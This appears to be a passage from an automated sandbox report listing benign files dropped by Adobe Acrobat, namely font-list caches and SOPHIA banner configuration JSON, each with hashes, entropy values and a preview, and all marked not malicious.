                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.3508

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):1233
                                                                          Entropy (8bit):5.233980037532449
                                                                          Encrypted:false
                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):1233
                                                                          Entropy (8bit):5.233980037532449
                                                                          Encrypted:false
                                                                          SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                          MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                          SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                          SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                          SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt23.lst (copy)

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):10880
                                                                          Entropy (8bit):5.214360287289079
                                                                          Encrypted:false
                                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt23.lst.3508

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:PostScript document text
                                                                          Category:dropped
                                                                          Size (bytes):10880
                                                                          Entropy (8bit):5.214360287289079
                                                                          Encrypted:false
                                                                          SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                          MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                          SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                          SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                          SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                          Malicious:false
                                                                          Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.36751859002522
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJM3g98kUwPeUkwRe9:YvXKXBQ2vR/ZwHADGMbLUkee9
                                                                          MD5:76CFED16C5F07634C118CFCFFFC4EFA0
                                                                          SHA1:4E88088D2DDFAA725A353329D959FEE5654151E1
                                                                          SHA-256:33E892D1BB3C52985507DFD7ECEABA04AA15BB2F6636B590C4CD9137B91688A6
                                                                          SHA-512:642F305DCFF13735CDA2CACA784A77083B6BCEFFE8B951CEB8FF444D2C4629F0AA68B6A6F23A363C15D207E9100A7E5FC59D29DD1421AFA337A6B93D7CB4180C
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.303035057634135
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfBoTfXpnrPeUkwRe9:YvXKXBQ2vR/ZwHADGWTfXcUkee9
                                                                          MD5:6251FC46F622F997FA3132B402527F1A
                                                                          SHA1:607EB503E18BA598F655524B469F995F9848FD27
                                                                          SHA-256:F75DD67594C842425463CA088D910D830A4B879B3D81006F4B1C04BEF03C1C91
                                                                          SHA-512:B8C22DE588B5670A041C9AEABD4B2D48014F4C0242DCE2BB7F20DB57581207C31DC182A35C71AFE54D838760505E9D68EBB79BA6A9C8B4EA105617E7A6FDD8C2
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):294
                                                                          Entropy (8bit):5.280885151211205
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfBD2G6UpnrPeUkwRe9:YvXKXBQ2vR/ZwHADGR22cUkee9
                                                                          MD5:9025FBE727AC5D86F5737C24822D7FE6
                                                                          SHA1:F21FE4D2216A513B195B1CDC62405B2EECBAEC14
                                                                          SHA-256:DC222F17418DCBA5D04DC035C0052BF90DC4B64925B77328F91FACCA28C4B104
                                                                          SHA-512:C6A12B6F3F3027EAC7FA9CE8EE011FF05DB5E63A6FBB8E3B35DE2D8A528A57DB22966730ACC303D0C7A0BABE9DE2CAF2E68603444AD969C354A0DD62110648FD
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):285
                                                                          Entropy (8bit):5.344612933191849
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfPmwrPeUkwRe9:YvXKXBQ2vR/ZwHADGH56Ukee9
                                                                          MD5:ACE10A44865E0E911F94BF1B549F0580
                                                                          SHA1:78BE1F736201B7402C5FCAB3AF16F45A2AEE46C1
                                                                          SHA-256:4E3485AD748BCDF887A1A1F581FE2A97320130BA8E97C1D4F29BDD8103CCDB3A
                                                                          SHA-512:D8B93837D3AE79CFF49EC63DF322DF3140FEF2D1820A191EA9530459DEC18EE9DAF1E2D3A2382DC04E32A2205B2FDC0F7CC0A74A586BE6EAAC3462D12E9F11C0
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):1123
                                                                          Entropy (8bit):5.69291226354911
                                                                          Encrypted:false
                                                                          SSDEEP:24:Yv6XB/Jh0pLgE9cQx8LennAvzBvkn0RCmK8czOCCSmS:YvE/Jh0hgy6SAFv5Ah8cv/mS
                                                                          MD5:31CA50AA38D644E30361D610549C7A0E
                                                                          SHA1:5BD53B2AD0C3688717CA55791F72C62186453A6B
                                                                          SHA-256:90D0B1024922F40B69D29EBE2B9CBF092DF0AB0EF7D3156D65F7032AB65BEADD
                                                                          SHA-512:28378754FFB02D94399E70EB7963BB0F2F922C11A4E8BAC1965E1663309182F3D02758B4E6446CCAF0547A933BC102FB83304BA902087EC912DC5E383A8F1513
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.293773692819184
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJf8dPeUkwRe9:YvXKXBQ2vR/ZwHADGU8Ukee9
                                                                          MD5:1AB62CF1EC1464CA13AEE18E5FC1A616
                                                                          SHA1:25386D756008954C33064B2BB6291E957908EF85
                                                                          SHA-256:4EBD4E4E5CF68D394A1696FF2BFB3B138D2765C333D23BF4203E1ECDFD24A535
                                                                          SHA-512:D2E8F503B352475826017561C42EA56FF1636C84652441B9AF46395852E0846618463A6262B9B4A60C39CD3DE9E003A8BE86954E60A43CCDA51F8AB913D9AC87
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):292
                                                                          Entropy (8bit):5.291878005137427
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfQ1rPeUkwRe9:YvXKXBQ2vR/ZwHADGY16Ukee9
                                                                          MD5:F4EE933A526D0C2B2D0DAD794A6C8761
                                                                          SHA1:84C2D1D8AFC449560B44F24C2F1C588DD794583C
                                                                          SHA-256:AE905615B36BD9E8DE2C6F98D91B556E122772BD8A07365A68E2D9F921DCB2EE
                                                                          SHA-512:2CB31E63B4CD13015FC606F8B5714CFAD2521ED69A8CE0508DAACB0D21574D09B808E16C09DA69AE7E07F1DF282A8F49F3FF6EF56E3A0696FB30038A0CCF1D36
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.308695716777128
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfFldPeUkwRe9:YvXKXBQ2vR/ZwHADGz8Ukee9
                                                                          MD5:0D6695E11A8B5E8B298F86CD50B33488
                                                                          SHA1:FA70E96F2C417ECB162D5CA0B1A79E149E547C44
                                                                          SHA-256:D5F744CB6359C375A3147BA3373CA2E94321D44F952E4CC7E06E2D0076C66325
                                                                          SHA-512:550DD9BF29AD46294AE00EFF7451165D7994D9C82FB9432FF097AE0F741F191FBF1F468A07EDEEDABCE7ADAA6E8D84EBBFF137E65E0B104BE2BD253BF72C182F
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):295
                                                                          Entropy (8bit):5.323246726347738
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfzdPeUkwRe9:YvXKXBQ2vR/ZwHADGb8Ukee9
                                                                          MD5:2A0FD6328A47D98BA9820C3A3E3A389C
                                                                          SHA1:09F86E21F3FDBA65858768C07CACE7E3A2CE9157
                                                                          SHA-256:0162D9CC80EB029E30B493F14ED3047E58F4D31EADA1AB4B7383CE629F99419C
                                                                          SHA-512:8FE9C6C08B3F3A3204876572CB82826947E24F89CEAFB39992B71E253759450816B2D75925ABF5894B08DE78AE6FB80CADFC86929B6C11163365D78CC28ACDCC
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):289
                                                                          Entropy (8bit):5.3033650641862735
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfYdPeUkwRe9:YvXKXBQ2vR/ZwHADGg8Ukee9
                                                                          MD5:C0DD29A194625C93212190392013B39B
                                                                          SHA1:F70E3067EE031CCBC2FF406C3448C96027C1EF6F
                                                                          SHA-256:2991AD5379BCF12777CE244654CB8EBC87D39C5E88A40598D0FAF496F7221617
                                                                          SHA-512:A096F8FB6A895A5FAB3E83BD676C99E89602BD328A7D48F536C1BC4CF1E39F63D8EE92B27E25A392B6352A5B2019760B0BFACB6A98622BEE61AC2E6CAAAEB722
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):284
                                                                          Entropy (8bit):5.289474681096934
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJf+dPeUkwRe9:YvXKXBQ2vR/ZwHADG28Ukee9
                                                                          MD5:DA3F1025AA80CABE6FE8EA3BDA149544
                                                                          SHA1:9A879B96EA15438CC01AD0CBF3A6001BC78DB311
                                                                          SHA-256:3A1A0812A3021C0C030F0AEDE15FDE1F1C46EF5F4572CC421C201464E9DFF6D1
                                                                          SHA-512:6B80E7BCD78E8886CC1FDED0049E9B616828F3EEA6E06B07652E2CF2BCB5CD70B25EF4CD033C64707C2F7E6AA85F531F03C432067AF9488BF094832BCD544302
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):291
                                                                          Entropy (8bit):5.286889034271227
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJfbPtdPeUkwRe9:YvXKXBQ2vR/ZwHADGDV8Ukee9
                                                                          MD5:324086A88EA41F353B2A0BA6C94B0BEB
                                                                          SHA1:4D7EE391C9E3FF65D0F77681005DDCC091C07599
                                                                          SHA-256:B53C9BCB738B037976A9BF128953CCAC529A897136B1C4591DE614EA0083FB4B
                                                                          SHA-512:EE1C2EDFAB777363A9CCD3D2BB9732C4C964BA00B886BC9EE71D9693DE64E4F53CDBB9788238507893A81A9E02176202CBC50F5E9A05F75467465425B87EEFDF
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Retention

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):287
                                                                          Entropy (8bit):5.2853288109353915
                                                                          Encrypted:false
                                                                          SSDEEP:6:YEQXJ2HXBjM2vB3/dVlPIHAR0Y0DoAvJf21rPeUkwRe9:YvXKXBQ2vR/ZwHADG+16Ukee9
                                                                          MD5:3740C1DCA885472AE9EF81DD831BEB02
                                                                          SHA1:50B417A1A575DFDA639D80F352EC0838B6C3B925
                                                                          SHA-256:F74B4361A6E913226CF69286C95DB081B0B2C9F16166C30B60BD4712374AE146
                                                                          SHA-512:4FCA4C033DA29F721B0C2BB202A82B67CB7F960E1DC0A8B5A22F80D796923C151135E9171A43A270AF5EAD6C14A8F73C71628F406FB645D06E039CA9FA0B9E91
                                                                          Malicious:false
                                                                          Preview:{"analyticsData":{"responseGUID":"62538152-f2b9-4c57-81d9-0d3ef568cfc4","sophiaUUID":"6BC8D74A-F8DC-462C-8ED4-D40FDD780397"},"encodingScheme":true,"expirationDTS":1734200276243,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

                                                                          C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Sign_LHP_Banner

